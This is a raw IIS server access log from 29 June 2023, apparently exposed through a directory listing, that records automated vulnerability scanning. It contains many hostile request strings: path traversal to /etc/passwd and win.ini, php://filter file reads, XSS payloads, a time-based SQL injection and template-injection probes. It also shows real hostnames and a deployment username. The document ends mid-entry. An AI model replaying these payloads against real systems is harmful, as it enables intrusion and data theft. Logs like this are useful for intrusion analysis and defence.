????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230629.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 00:17:14 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 00:17:14 103.153.214.94 GET /conf/nginx.conf - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 29 2023-06-29 00:17:53 103.153.214.94 GET /pub/bscw.cgi/30 op=theme&style_name=../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 27 2023-06-29 00:18:11 103.153.214.94 GET /graph_realtime.php action=init 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 25 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 00:42:51 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 00:42:50 103.153.214.94 GET /settings - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 26 2023-06-29 00:49:25 103.153.214.94 GET /fpui/jsp/index.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 01:06:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 01:06:39 103.153.214.94 GET /index.php controller=../../../../../etc/passwd%00&option=com_joomlapicasa2 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 29 2023-06-29 01:11:00 103.153.214.94 GET /sftp-config.json - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 48 2023-06-29 01:13:58 103.153.214.94 POST /login.php action=login&type=admin 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 27 2023-06-29 01:17:58 103.153.214.94 POST /goanywhere/lic/accept - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 29 2023-06-29 01:19:58 103.153.214.94 GET /index.php controller=../../../../../../../../../etc/passwd%00&option=com_graphics 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28 2023-06-29 01:30:29 103.153.214.94 GET /webshell4/login.php err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 32 2023-06-29 01:30:29 103.153.214.94 GET /webshell4/login.php login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 24 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 01:50:37 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 01:50:37 103.153.214.94 GET /admin/ id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN&page=teams/manage_team 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 25 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 02:07:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 02:07:04 103.153.214.94 GET /sensorlist.htm - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30 2023-06-29 02:17:03 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../../../etc/passwd%00&option=com_picasa2gallery 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28 2023-06-29 02:18:42 103.153.214.94 GET /magmi/web/ajax_pluginconf.php file=../../../../../../../../../../../etc/passwd&pluginclass=CustomSQLUtility&plugintype=utilities 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 58 2023-06-29 02:27:03 103.153.214.94 POST /api/v2/open/rowsInfo - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 34 2023-06-29 02:32:56 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 171.231.175.237 - - 401 2 5 40 2023-06-29 02:32:56 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 - - 200 0 0 72 2023-06-29 02:32:56 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 - - 200 0 0 81 2023-06-29 02:32:57 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 - - 200 0 0 1243 2023-06-29 02:32:57 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 VSCmdLine:WTE6.0.6.36821;sid=f1005680-9613-4936-a9f4-d1d4a156bbb2;op=Sync - 200 0 0 573 2023-06-29 02:32:57 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 - - 200 0 0 27 2023-06-29 02:32:57 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 VSCmdLine:WTE6.0.6.36821;sid=f1005680-9613-4936-a9f4-d1d4a156bbb2;op=Sync - 200 0 0 333 2023-06-29 02:32:57 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.175.237 - - 200 0 0 440 2023-06-29 02:39:58 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 33 2023-06-29 02:39:59 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 28 2023-06-29 02:40:00 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 28 2023-06-29 02:40:01 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 24 2023-06-29 02:40:02 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 23 2023-06-29 02:40:02 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 23 2023-06-29 02:40:04 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 26 2023-06-29 02:40:05 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 37 2023-06-29 02:40:05 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 25 2023-06-29 02:40:07 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 29 2023-06-29 02:40:10 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 65 2023-06-29 02:40:10 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 42 2023-06-29 02:40:12 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 65 2023-06-29 02:40:12 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 34 2023-06-29 02:40:14 103.153.214.94 GET /console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 51 2023-06-29 02:40:15 103.153.214.94 POST /console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 24 2023-06-29 02:43:46 103.153.214.94 POST /ubus/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 03:01:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 03:01:13 103.153.214.94 POST /htdocs/login/login.lua - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 31 2023-06-29 03:02:40 103.153.214.94 GET /install/app.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27 2023-06-29 03:04:30 103.153.214.94 POST /content/2ReXayjBM7Ql6eo4xaY7dWX4XYW - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 28 2023-06-29 03:04:30 103.153.214.94 POST /content/2ReXayjBM7Ql6eo4xaY7dWX4XYW.af.internalsubmit.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 25 2023-06-29 03:09:23 103.153.214.94 GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php action=style-clean&file_path=/wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 25 2023-06-29 03:11:53 103.153.214.94 GET /wp-content/plugins/simple-fields/simple_fields.php wp_abspath=/etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27 2023-06-29 03:20:27 103.153.214.94 GET /uir/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 28 2023-06-29 03:22:15 103.153.214.94 GET /dataservice/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 30 2023-06-29 03:27:47 103.153.214.94 GET /wp-admin/options.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 something 404 7 0 29 2023-06-29 03:32:39 103.153.214.94 GET / - 8172 - 87.236.176.95 Mozilla/5.0+(compatible;+InternetMeasurement/1.0;++https://internet-measurement.com/) - 404 7 0 276 2023-06-29 03:40:49 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29 2023-06-29 03:53:52 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_datafeeds 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 30 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 04:18:37 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 04:18:37 103.153.214.94 GET / a=display&templateFile=README.md 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 27 2023-06-29 04:18:46 103.153.214.94 GET /wp-content/plugins/finder/index.php by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 04:38:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 04:38:48 103.153.214.94 PUT /testing-put.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 33 2023-06-29 04:38:48 103.153.214.94 GET /testing-put.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 24 2023-06-29 04:47:02 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_vjdeo 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 33 2023-06-29 04:48:15 103.153.214.94 GET /setup - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29 2023-06-29 04:53:48 103.153.214.94 GET /index.php s=example 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 28 2023-06-29 04:54:08 103.153.214.94 GET /dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26 2023-06-29 04:54:08 103.153.214.94 GET /PhpSpreadsheet/Writer/PDF/DomPDF.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 28 2023-06-29 04:54:08 103.153.214.94 GET /lib/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24 2023-06-29 04:54:08 103.153.214.94 GET /includes/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 23 2023-06-29 04:54:08 103.153.214.94 GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 26 2023-06-29 04:54:09 103.153.214.94 GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27 2023-06-29 04:54:09 103.153.214.94 GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 23 2023-06-29 04:54:09 103.153.214.94 GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27 2023-06-29 04:54:09 103.153.214.94 GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 23 2023-06-29 04:54:09 103.153.214.94 GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 31 2023-06-29 04:54:09 103.153.214.94 GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 30 2023-06-29 04:56:35 103.153.214.94 GET /download.php file=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 31 2023-06-29 05:06:11 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 26 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 05:23:37 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 05:23:37 103.153.214.94 GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 33 2023-06-29 05:24:07 103.153.214.94 GET /component/music/album.html cid=../../../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 26 2023-06-29 05:35:42 103.153.214.94 GET /wp-admin/admin-ajax.php ID=<svg%20onload=alert(document.domain)>&action=lwp_forgot_password 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 32 2023-06-29 05:48:45 103.153.214.94 GET /spreadsheet-reader/test.php File=../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 27 2023-06-29 05:48:45 103.153.214.94 GET /nuovo/spreadsheet-reader/test.php File=../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 23 2023-06-29 05:50:42 103.153.214.94 POST /login.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 38 2023-06-29 05:52:01 103.153.214.94 POST /minio/webrpc - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 34 2023-06-29 05:52:01 103.153.214.94 POST /minio/webrpc - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 25 2023-06-29 06:04:56 103.153.214.94 GET /oliver/FileServlet fileName=c:/windows/win.ini&source=serverFile 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 29 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 06:21:22 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 06:21:21 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 32 2023-06-29 06:21:21 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27 2023-06-29 06:21:21 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 24 2023-06-29 06:22:18 103.153.214.94 GET /index.php controller=../../../../../../../etc/passwd%00&option=com_joomlaupdater 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 29 2023-06-29 06:25:57 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcomment 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 06:46:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 06:46:39 103.153.214.94 GET /git/notifyCommit branches=2ReXahy3cg3aTPuMreYa25i4Z1W&url=2ReXahy3cg3aTPuMreYa25i4Z1W 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 27 2023-06-29 06:49:08 103.153.214.94 GET /search search_key=%7B%7B1337*1338%7D%7D 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 29 2023-06-29 06:58:12 103.153.214.94 POST /XMLCHART - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 55 2023-06-29 07:00:13 103.153.214.94 GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php file=../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 28 2023-06-29 07:04:32 103.153.214.94 GET 